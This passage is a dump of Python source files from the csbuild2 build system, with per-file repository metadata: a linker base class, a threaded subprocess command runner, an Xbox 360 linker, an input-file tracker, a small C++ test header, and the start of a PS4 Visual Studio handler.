HasStaticRuntime):\n\t\"\"\"\n\tBase class for a linker\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._libraries = projectSettings.get(\"libraries\", ordered_set.OrderedSet())\n\t\tself._libraryDirectories = projectSettings.get(\"libraryDirectories\", ordered_set.OrderedSet())\n\t\tself._linkerFlags = projectSettings.get(\"linkerFlags\", [])\n\t\tself._rpathDirectories = projectSettings.get(\"rpathDirectories\", ordered_set.OrderedSet())\n\t\tself._actualLibraryLocations = {\n\t\t\tlibrary : library\n\t\t\tfor library in self._libraries\n\t\t}\n\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDebugRuntime.__init__(self, projectSettings)\n\t\tHasStaticRuntime.__init__(self, projectSettings)\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tProject setup - in this case, verify libraries before running the build.\n\n\t\t:param project: Project to set up for\n\t\t:type project: project.Project\n\t\t:raises LibraryError: If a library is not found\n\t\t\"\"\"\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDebugRuntime.SetupForProject(self, project)\n\t\tHasStaticRuntime.SetupForProject(self, project)\n\n\t\tlog.Linker(\"Verifying libraries for {}...\", project)\n\n\t\t# Make all the library directory paths are absolute after the macro formatter has been run on them.\n\t\tself._libraryDirectories = ordered_set.OrderedSet(\n\t\t\t[os.path.abspath(directory) for directory in self._libraryDirectories]\n\t\t)\n\n\t\tif self._libraries:\n\t\t\tself._actualLibraryLocations = self._findLibraries(project, self._libraries)\n\n\t\t\tif self._actualLibraryLocations is None:\n\t\t\t\traise LibraryError(project)\n\n\t\tfor dependProject in project.dependencies:\n\t\t\toutputExt = self._getOutputExtension(dependProject.projectType)\n\t\t\tif outputExt is not None:\n\t\t\t\tself._actualLibraryLocations[dependProject.outputName] = \\\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\tdependProject.outputDir,\n\t\t\t\t\t\t\"{}{}\".format(dependProject.outputName, outputExt)\n\t\t\t\t\t)\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddLibraries(*libs):\n\t\t\"\"\"\n\t\tAdd libraries to be linked against. These can be provided as either 'foo' or 'libfoo.a'/'libfoo.lib'\n\t\tas is appropriate for the platform.\n\n\t\t:param libs: List of libraries\n\t\t:type libs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"libraries\", libs)\n\n\t@staticmethod\n\tdef AddLibraryDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to look for libraries in\n\n\t\t:param dirs: Directories to scan\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"libraryDirectories\", list(dirs))\n\n\t@staticmethod\n\tdef AddLinkerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd linker flags.\n\n\t\t:param flags: List of linker flags.\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"linkerFlags\", flags)\n\n\t@staticmethod\n\tdef AddRpathDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to include in the linked output's RPATH.\n\n\t\t:param dirs: RPATH directory paths\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"rpathDirectories\", list(dirs))\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from linking a project\n\n\t\t:param project: project being linked\n\t\t:type project: project.Project\n\t\t:return: tuple of files that will be produced from linking\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles):\n\t\t\"\"\"\n\t\tGet the command to link the provided set of files for the provided project\n\n\t\t:param project: Project to link\n\t\t:type project: project.Project\n\t\t:param inputFiles: files being linked\n\t\t:type inputFiles: input_file.InputFile\n\t\t:return: Command to execute, broken into a list, as would be provided to subrpocess functions\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn []\n\n\t@abstractmethod\n\tdef _findLibraries(self, project, libs):\n\t\t\"\"\"\n\t\tSearch for the provided set of libraries, verify they exist, and map them to their actual file locations.\n\n\t\t:param project: Project searching for libraries.\n\t\t:type project: :class:`csbuild._build.project.Project`\n\n\t\t:param libs: Libraries to search for.\n\t\t:type libs: str\n\n\t\t:return: Map of input string to actual absolute path to the library.\n\t\t:rtype: dict[str, str]\n\t\t\"\"\"\n\t\treturn {}\n\n\t@abstractmethod\n\tdef _getOutputExtension(self, projectType):\n\t\t\"\"\"\n\t\tGet the output extension for a given project type\n\n\t\t:param projectType: the project type\n\t\t:type projectType: csbuild.ProjectType\n\t\t:return: the extension, including the dot\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"\"\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject:\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of files to build\n\t\t:type inputFiles: list[input_file.InputFile]\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Linker(\n\t\t\t\"Linking {}{} ({}-{}-{})...\",\n\t\t\tinputProject.outputName,\n\t\t\tself._getOutputExtension(inputProject.projectType),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles), env=self._getEnv(inputProject), cwd=inputProject.outputDir)\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\t\treturn self._getOutputFiles(inputProject)\n" }, { "alpha_fraction": 0.7471131682395935, "alphanum_fraction": 0.7489277720451355, "avg_line_length": 33.63999938964844, "blob_id": "3da563980ca6f098c6b76b1dcc88da89c89a0fd6", "content_id": "ddf6e19233e499d67935ce5b466d468fd6b41247", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6062, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/csbuild/commands.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: commands\n\t:synopsis: Utility functions for running commands across multiple threads with real-time output processing\n\t\tand semi-real-time synchronized output printing\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport subprocess\nimport threading\n\nfrom . import shared_globals, log, perf_timer\nfrom ._utils import PlatformUnicode, queue\nfrom ._utils.decorators import TypeChecked\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\nif sys.version_info >= (3,3,0):\n\tfrom shlex import quote\nelse:\n\tfrom pipes import quote\n\nqueueOfLogQueues = queue.Queue()\nstopEvent = object()\n\ndef PrintStaggeredRealTimeOutput():\n\t\"\"\"\n\tHandle output put into the queue of queues\n\tGrab the first queue from the outer queue, then process all output from that queue\n\tuntil told to stop before moving on to the next queue. Each process that emits output creates\n\tits own queue; this ensures output from a single process is printed as soon as it's available,\n\tbut output from multiple processes is not interleaved.\n\t\"\"\"\n\twhile True:\n\t\tinnerQueue = queueOfLogQueues.GetBlocking()\n\t\tif innerQueue is stopEvent:\n\t\t\tbreak\n\t\twhile True:\n\t\t\tmsg = innerQueue.GetBlocking()\n\t\t\tif msg is stopEvent:\n\t\t\t\tbreak\n\t\t\tmsg[0](msg[1])\n\nclass _sharedStreamProcessingData(object):\n\tdef __init__(self):\n\t\tself.queue = None\n\t\tself.lock = threading.Lock()\n\ndef LogNonInterleavedOutput(logFunction, shared, msg):\n\t\"\"\"\n\tHandle output from a process by putting it into the process-specific queue,\n\twhich is itself placed into the queue of queues lazily if it's not already there.\n\n\t:param logFunction: Function to actually print the log message\n\t:type logFunction: Callable\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\t#Double-check lock pattern\n\tif shared.queue is None:\n\t\twith shared.lock:\n\t\t\tif shared.queue is None:\n\t\t\t\tshared.queue = queue.Queue()\n\t\t\t\tqueueOfLogQueues.Put(shared.queue)\n\tshared.queue.Put((logFunction, msg))\n\ndef DefaultStdoutHandler(shared, msg):\n\t\"\"\"\n\tDefault handler for process stdout, logs with log.Stdout\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\tLogNonInterleavedOutput(log.Stdout, shared, msg)\n\ndef DefaultStderrHandler(shared, msg):\n\t\"\"\"\n\tDefault handler for process stderr, logs with log.Stderr\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\tLogNonInterleavedOutput(log.Stderr, shared, msg)\n\n@TypeChecked(cmd=list, stdout=(Callable, type(None)), stderr=(Callable, type(None)))\ndef Run(cmd, stdout=DefaultStdoutHandler, stderr=DefaultStderrHandler, **kwargs):\n\t\"\"\"\n\tRun a process, collecting its output in realtime. Each line of output will be passed\n\tto the appropriate callback (stdout or stderr) one line at a time - the callback will be\n\tcalled once for each line. This function will block until the command exits.\n\n\t:param cmd: The command to run as a list of arguments, with the first parameter being the executable\n\t:type cmd: list\n\t:param stdout: Callback that will be called for each line of stdout at the moment it's emitted.\n\t:type stdout: Callable, None\n\t:param stderr: Callback that will be called for each line of stderr at the moment it's emitted.\n\t:type stderr: Callable, None\n\t:param kwargs: Additional arguments to be passed to subprocess.Popen(). See subprocess documentation\n\t:type kwargs: any\n\t:return: Tuple of return code, stdout as a single block string, and stderr as a single block string\n\t:rtype: tuple[int, str, str]\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Commands\"):\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\" \".join(quote(s) for s in cmd))\n\n\t\toutput = []\n\t\terrors = []\n\t\tshared = _sharedStreamProcessingData()\n\n\t\tdef _streamOutput(pipe, outlist, callback):\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tline = PlatformUnicode(pipe.readline())\n\t\t\t\texcept IOError:\n\t\t\t\t\tcontinue\n\t\t\t\t# Empty string means pipe was closed, possibly due to process exit, and we can leave the loop.\n\t\t\t\t# A blank line output by the pipe would be returned as \"\\n\"\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\t#Callback excludes newline\n\t\t\t\tif callback is not None:\n\t\t\t\t\tcallback(shared, line.rstrip(\"\\n\\r\"))\n\t\t\t\toutlist.append(line)\n\n\t\tproc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)\n\n\t\toutputThread = threading.Thread(target=_streamOutput, args=(proc.stdout, output, stdout))\n\t\terrorThread = threading.Thread(target=_streamOutput, args=(proc.stderr, errors, stderr))\n\n\t\toutputThread.start()\n\t\terrorThread.start()\n\n\t\toutputThread.join()\n\t\terrorThread.join()\n\n\t\tproc.wait()\n\n\t\tproc.stdout.close()\n\t\tproc.stderr.close()\n\n\t\tif shared.queue is not None:\n\t\t\tshared.queue.Put(stopEvent)\n\n\t\treturn proc.returncode, \"\".join(output), \"\".join(errors)\n" }, { "alpha_fraction": 0.6798418760299683, "alphanum_fraction": 0.6859118938446045, "avg_line_length": 36.48147964477539, "blob_id": "ba4e0c649257f9b714ba72c0d94624674b45d443", "content_id": "e694de5ee415236828cf443ad2e11fdb35b6d802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7084, "license_type": "no_license", "max_line_length": 135, "num_lines": 189, "path": "/csbuild/tools/linkers/xbox_360_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_linker\n\t:synopsis: Xbox 360 linker tool for C/C++ and assembly.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ..common import FindLibraries\nfrom ..common.xbox_360_tool_base import Xbox360BaseTool\nfrom ..common.tool_traits import HasDebugLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\n\nclass Xbox360Linker(Xbox360BaseTool, LinkerBase):\n\t\"\"\"\n\tXbox 360 linker tool implementation for c/c++ and asm.\n\t\"\"\"\n\tsupportedPlatforms = {\"Windows\"}\n\tsupportedArchitectures = {\"xcpu\"}\n\tinputGroups = {\".obj\", \".o\"}\n\toutputFiles = {\".exe\", \".lib\", \".dll\"}\n\tcrossProjectDependencies = {\".lib\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\toutputFiles = {\n\t\t\tcsbuild.ProjectType.Application: [\"{}.exe\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.StaticLibrary: [\"{}.lib\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.SharedLibrary: [\"{}.dll\".format(outputPath)],\n\t\t}[project.projectType]\n\n\t\t# Output files when not building a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\t\"{}.ilk\".format(outputPath),\n\t\t\t\t\"{}.pe\".format(outputPath),\n\t\t\t\t\"{}.xdb\".format(outputPath),\n\t\t\t])\n\n\t\t\t# Add the PDB file if debugging is enabled.\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\n\t\t# Can't predict these things, linker will make them if it decides to.\n\t\tpossibleFiles = [\"{}.exp\".format(outputPath), \"{}.lib\".format(outputPath)]\n\t\toutputFiles.extend([filename for filename in possibleFiles if os.access(filename, os.F_OK)])\n\n\t\treturn tuple(set(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = os.path.join(self._xbox360BinPath, \"lib.exe\")\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\telse:\n\t\t\tcmdExe = os.path.join(self._xbox360BinPath, \"link.exe\")\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryArgs(project)\n\n\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories)\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".lib\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# These are extensions of the files that can be output from the linker or librarian.\n\t\t# The library extensions should represent the file types that can actually linked against.\n\t\text = {\n\t\t\tcsbuild.ProjectType.Application: \".exe\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".lib\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\treturn ext.get(projectType, None)\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\n\t\t# Xbox 360 does not support linking directly against dynamic libraries so we\n\t\t# need to remove any project dependencies of that type from the library list.\n\t\tfor dependProject in project.dependencies:\n\t\t\tif dependProject.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\tdel self._actualLibraryLocations[dependProject.outputName]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"/ERRORREPORT:NONE\",\n\t\t\t\"/NOLOGO\",\n\t\t\t\"/MACHINE:PPCBE\",\n\t\t\t\"/SUBSYSTEM:XBOX\"\n\t\t]\n\n\t\t# Arguments for any project that is not a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/DEBUG\")\n\t\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\targs.append(\"/DLL\")\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"/LIBPATH:{}\".format(self._xbox360LibPath),\n\t\t\t\"xboxkrnl.lib\",\n\t\t\t\"xbdm.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dll\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}.get(project.projectType, \".exe\")\n\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\targs = [\"/OUT:{}{}\".format(outputPath, outExt)]\n\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"/IMPLIB:{}.lib\".format(outputPath))\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\t#args.append(\"/PGD:{}.pgd\".format(outputPath))\n\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/PDB:{}.pdb\".format(outputPath))\n\n\t\treturn args\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.7254986763000488, "alphanum_fraction": 0.7270164489746094, "avg_line_length": 28.564102172851562, "blob_id": "b0cd7a028aca229a02149e0386957800e3f5cbdf", "content_id": "6a8329b23ffa91f16d0055756d3cc496119e6dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4612, "license_type": "no_license", "max_line_length": 116, "num_lines": 156, "path": "/csbuild/_build/input_file.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: input_file\n\t:synopsis: Information about a file used as a tool input\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport hashlib\nimport sys\n\nfrom .._utils.decorators import TypeChecked\nfrom .._utils import PlatformBytes\nfrom .._utils import PlatformString\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass InputFile(object):\n\t\"\"\"\n\tRepresents an input file along with its tool history.\n\tStores both the full set of tools used to create the file,\n\tas well as a link to the previous input source that created it\n\n\t:param filename: The filename\n\t:type filename: str, bytes\n\n\t:param sourceInputs: The previous sinput in the chain (if None, this represents the first input)\n\t:type sourceInputs: ordered_set.OrderedSet[InputFile]\n\n\t:param upToDate: whether or not the file was up to date (i.e., no build was performed)\n\t:type upToDate: bool\n\t\"\"\"\n\tdef __init__(self, filename, sourceInputs=None, upToDate=False):\n\t\tself._filename = os.path.abspath(PlatformString(filename))\n\t\tself._sourceInputs = sourceInputs\n\t\tself._toolsUsed = set()\n\t\tself._upToDate = upToDate\n\t\tself._uniqueDirectoryId = None\n\t\tif sourceInputs is not None:\n\t\t\tif isinstance(sourceInputs, InputFile):\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tself._toolsUsed |= sourceInputs._toolsUsed\n\t\t\telse:\n\t\t\t\tfor sourceInput in sourceInputs:\n\t\t\t\t\t# pylint: disable=protected-access\n\t\t\t\t\tself._toolsUsed |= sourceInput._toolsUsed\n\n\tdef __repr__(self):\n\t\tmainFileDir = os.path.dirname(sys.modules[\"__main__\"].__file__)\n\t\ttry:\n\t\t\treturn os.path.relpath(self._filename, mainFileDir).replace(\"\\\\\", \"/\")\n\t\texcept:\n\t\t\treturn self._filename\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef AddUsedTool(self, tool):\n\t\t\"\"\"\n\t\tAdd a tool to the set of tools that have been used on this file\n\n\t\t:param tool: The used tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tself._toolsUsed.add(tool)\n\n\t@TypeChecked(tool=(_classType, _typeType), _return=bool)\n\tdef WasToolUsed(self, tool):\n\t\t\"\"\"\n\t\tCheck if a tool was used in the process of creating this file (or any file used in the input chain that led to it)\n\n\t\t:param tool: The tool to check\n\t\t:type tool: type\n\t\t:return: True if the tool was used, False otherwise\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn tool in self._toolsUsed\n\n\t@property\n\tdef filename(self):\n\t\t\"\"\"\n\t\tGet the absolute path to the file\n\n\t\t:return: Absolute path to the file\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._filename\n\n\t@property\n\tdef sourceInputs(self):\n\t\t\"\"\"\n\t\tGet the InputFile that was used to create this file, if any\n\n\t\t:return: The InputFile that was used to create this file\n\t\t:rtype: list[InputFile] or None\n\t\t\"\"\"\n\t\treturn self._sourceInputs\n\n\t@property\n\tdef upToDate(self):\n\t\t\"\"\"\n\t\tGet whether or not the file was already up to date. If true, no build was performed.\n\n\t\t:return: Whether or not the file was up to date\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn self._upToDate\n\n\t@property\n\tdef toolsUsed(self):\n\t\t\"\"\"\n\t\tGet the list of tools used to make this input.\n\n\t\t:return: list of used tools\n\t\t:rtype: set\n\t\t\"\"\"\n\t\treturn self._toolsUsed\n\n\t@property\n\tdef uniqueDirectoryId(self):\n\t\t\"\"\"\n\t\tGet the unique identifier for the directory containing the file.\n\n\t\t:return: Directory unique identifier.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif self._uniqueDirectoryId is None:\n\t\t\tself._uniqueDirectoryId = hashlib.md5(PlatformBytes(os.path.dirname(self.filename))).hexdigest()\n\t\treturn self._uniqueDirectoryId\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 10.333333015441895, "blob_id": "c4cef9f6d666d0974a16dd95d49094dc4ad6dcae", "content_id": "e5ae84c9a516313ba7e58b6fd0d08c88d40f92e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 35, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/functional_tests/basic_cpp_test/fail_link/header.hpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n\nvoid hello_world();\n\n" }, { "alpha_fraction": 0.76484614610672, "alphanum_fraction": 0.7658001184463501, "avg_line_length": 37.824073791503906, "blob_id": "5b45a8a77b558183486e6d15e1ed6a400c73388d", "content_id": "656cf444c5bbf2174f94f15c3efe08db34bf2db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8386, "license_type": "no_license", "max_line_length": 159, "num_lines": 216, "path": "/csbuild/tools/project_generators/visual_studio/platform_handlers/ps4.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4\n\t:synopsis: Built-in Visual Studio platform handler for outputing PS4 project files.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\nfrom . import VsBasePlatformHandler\n\ndef _ignore(_):\n\tpass\n\nclass VsPs4PlatformHandler(VsBasePlatformHandler):\n\t\"\"\"\n\tVisual Studio platform handler as a base class, containing project writing functionality for the PS4 platform.\n\t\"\"\"\n\tdef __init__(self, buildTarget, vsInstallInfo):\n\t\tVsBasePlatformHandler.__init__(self, buildTarget, vsInstallInfo)\n\n\t@staticmethod\n\tdef 